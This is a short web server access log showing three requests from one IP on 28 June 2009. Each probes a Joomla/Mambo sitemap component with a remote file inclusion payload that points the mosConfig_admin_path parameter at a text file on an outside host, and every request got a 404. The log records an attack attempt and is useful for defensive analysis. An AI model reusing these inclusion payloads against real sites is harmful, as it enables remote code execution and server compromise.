58.227.193.198 - - [28/Jun/2009:05:16:29 -0400] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
58.227.193.198 - - [28/Jun/2009:05:16:29 -0400] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
58.227.193.198 - - [28/Jun/2009:05:16:29 -0400] "GET /logs/access_log.Q109051600/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
